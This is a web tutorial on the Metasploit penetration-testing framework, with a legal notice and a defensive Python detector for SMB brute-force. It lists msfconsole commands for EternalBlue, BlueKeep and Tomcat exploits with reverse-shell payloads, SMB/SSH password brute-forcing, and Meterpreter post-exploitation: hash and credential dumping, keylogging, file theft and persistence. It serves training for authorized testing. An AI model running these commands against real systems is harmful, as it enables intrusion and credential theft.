Metasploit

The world's most widely used penetration testing framework — thousands of exploits, auxiliary modules, post-exploitation tools, and payload handlers unified in a single platform.

Category: Exploitation
Platform: Linux / Kali
Type: CLI / Open Source
Skill Level: Beginner → Advanced

What is Metasploit?

Metasploit Framework is an open-source penetration testing platform maintained by Rapid7. It provides a unified environment for every phase of an engagement — from reconnaissance and vulnerability scanning, through exploitation and payload delivery, to post-exploitation, pivoting, and reporting. Its core interface is msfconsole, an interactive shell that gives access to over 2,000 exploit modules, hundreds of auxiliary scanners, and a rich post-exploitation toolkit including the powerful Meterpreter agent.

Metasploit is the glue that connects your other tools: use nmap to find open ports, look up the service version in Metasploit's exploit database, generate a payload with msfvenom, deliver it, catch the session with multi/handler, and pivot deeper with Meterpreter — all from within the same framework.

⚠ Legal Notice

Only use on systems you own or have explicit written permission to test. Unauthorized exploitation violates Pakistan's PECA 2016 and international cybercrime laws.

Installation

# Metasploit is pre-installed on Kali Linux
sudo apt update
sudo apt install metasploit-framework -y

# Initialize the database (required for workspace and search features)
sudo msfdb init

# Start msfconsole
msfconsole

# Start quietly (no banner)
msfconsole -q

# Check version
msfconsole --version

msfconsole Navigation

# Search for exploits, modules, or CVEs
search eternalblue
search type:exploit name:smb
search cve:2021-44228

# Get help on any command
help
help search
help use

# Show all available exploit modules
show exploits

# Show all auxiliary modules (scanners, fuzzers, etc.)
show auxiliary

# Show all post-exploitation modules
show post

# Check current module options
show options

# Show advanced options for a module
show advanced

# List loaded sessions
sessions -l

# Interact with a session by ID
sessions -i 1

Using an Exploit — Full Workflow

Every Metasploit engagement follows the same pattern: search, select, configure, verify, run.

# Step 1: Search for the exploit
search ms17-010

# Step 2: Select the module
use exploit/windows/smb/ms17_010_eternalblue

# Step 3: View required options
show options

# Step 4: Configure target and payload
set RHOSTS 10.10.10.40       # target IP
set LHOST 10.10.10.5         # your IP (for reverse connection)
set LPORT 4444               # your listening port
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Step 5: Verify the target is likely vulnerable
check

# Step 6: Run the exploit
run
# or
exploit

Common Exploit Examples

# EternalBlue — Windows SMB (MS17-010, WannaCry vector)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.5
run

# BlueKeep — Windows RDP (CVE-2019-0708)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 10.10.10.40
run

# Tomcat Manager — upload malicious WAR file
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 10.10.10.95
set HttpUsername tomcat
set HttpPassword tomcat
set LHOST 10.10.10.5
run

# Multi/handler — catch any reverse shell (MSFvenom payloads)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.5
set LPORT 4444
run

Auxiliary Modules — Scanning & Enumeration

# SMB version scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

# SMB login brute-force
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.10.10.40
set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

# SSH version + brute-force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.40
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

# HTTP directory scanner
use auxiliary/scanner/http/dir_scanner
set RHOSTS 10.10.10.40
set DICTIONARY /usr/share/seclists/Discovery/Web-Content/common.txt
run

# Port scanner (built-in)
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445,3389
run
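A run of smb_login attempts against one host leaves a burst of failed network logons (event ID 4625, logon type 3) from a single source, each trying a different account. The following added example, which is not from this page or the Metasploit project, shows detection logic for that pattern over constructed sample event lines; the CSV field layout, thresholds and addresses are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data). Fields:
# timestamp,event_id,target_user,source_ip,logon_type
# 4625 = failed logon, logon type 3 = network (what SMB auth produces).
SAMPLE_EVENTS = """\
2024-05-01T10:00:01,4625,administrator,10.10.10.5,3
2024-05-01T10:00:01,4625,guest,10.10.10.5,3
2024-05-01T10:00:02,4625,admin,10.10.10.5,3
2024-05-01T10:00:02,4625,user,10.10.10.5,3
2024-05-01T10:00:03,4625,root,10.10.10.5,3
2024-05-01T10:00:03,4625,test,10.10.10.5,3
2024-05-01T10:00:04,4624,jsmith,10.10.10.22,3
2024-05-01T10:05:00,4625,jsmith,10.10.10.22,3
"""


def parse_events(text):
    """Parse the constructed CSV layout into tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, eid, user, src, ltype = line.split(",")
        events.append((datetime.fromisoformat(ts), int(eid),
                       user.lower(), src, int(ltype)))
    return events


def detect_smb_bruteforce(events, window=timedelta(seconds=60),
                          min_failures=5, min_users=3):
    """Return {source_ip: (failures, distinct_users)} for every source whose
    failed network logons inside one sliding window exceed both thresholds.
    A single user failing repeatedly (a typo, a locked account) is ignored
    unless it also spans several accounts, which is the brute-force shape."""
    by_src = defaultdict(list)
    for ts, eid, user, src, ltype in events:
        if eid == 4625 and ltype == 3:
            by_src[src].append((ts, user))
    alerts = {}
    for src, fails in by_src.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Advance the window start until it fits within `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            win = fails[start:end + 1]
            users = {u for _, u in win}
            if len(win) >= min_failures and len(users) >= min_users:
                alerts[src] = (len(win), len(users))
    return alerts
```

Tune the window and thresholds to the environment: a short window with a low user count catches a wordlist run like the one above, while the single failure from 10.10.10.22 stays below it.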

Meterpreter — Post-Exploitation

Meterpreter is Metasploit's advanced payload agent. Once you have a Meterpreter session, these commands run on the compromised host.

# System information
sysinfo
getuid
getpid

# File system navigation
pwd
ls
cd C:\\Users\\Administrator\\Desktop
download secret.txt /home/kali/
upload shell.exe C:\\Windows\\Temp\\

# Privilege escalation
getsystem           # attempt automatic privilege escalation
getuid              # confirm new privilege level

# Dump hashes (requires SYSTEM)
hashdump

# Load Kiwi (Mimikatz in memory — no file on disk)
load kiwi
creds_all

# Network reconnaissance from target
ipconfig
arp
route
portfwd add -l 8080 -p 80 -r 192.168.10.5   # port forwarding / pivoting

# Spawn a native shell
shell

# Screenshot the desktop
screenshot

# Keylogger
keyscan_start
keyscan_dump
keyscan_stop

# Background current session (return to msfconsole)
background

# Persistence — add autorun registry key
run persistence -X -i 30 -p 4444 -r 10.10.10.5

Workspaces

Workspaces let you organise scan results and sessions by engagement — essential when testing multiple clients.

# List workspaces
workspace

# Create a new workspace
workspace -a client_corp

# Switch workspace
workspace client_corp

# Delete a workspace
workspace -d old_project

# Import Nmap XML scan results into current workspace
db_import nmap_results.xml

# Run Nmap from within Metasploit and save to DB
db_nmap -sV -sC 10.10.10.40

# Show all hosts discovered in current workspace
hosts

# Show all services discovered
services

# Show all found credentials
creds

Further Reading

The Metasploit Unleashed course (metasploit.help.rapid7.com) is the definitive free resource for learning the framework systematically. For hands-on practice, TryHackMe's "Metasploit" module and machines like "Blue" (EternalBlue), "Legacy", and "Jerry" on HackTheBox are ideal starting points. Combine Metasploit with msfvenom for custom payload generation and Mimikatz (via Kiwi) for credential harvesting — together they cover the full exploitation lifecycle. Also explore hackzia.site labs for guided walkthroughs.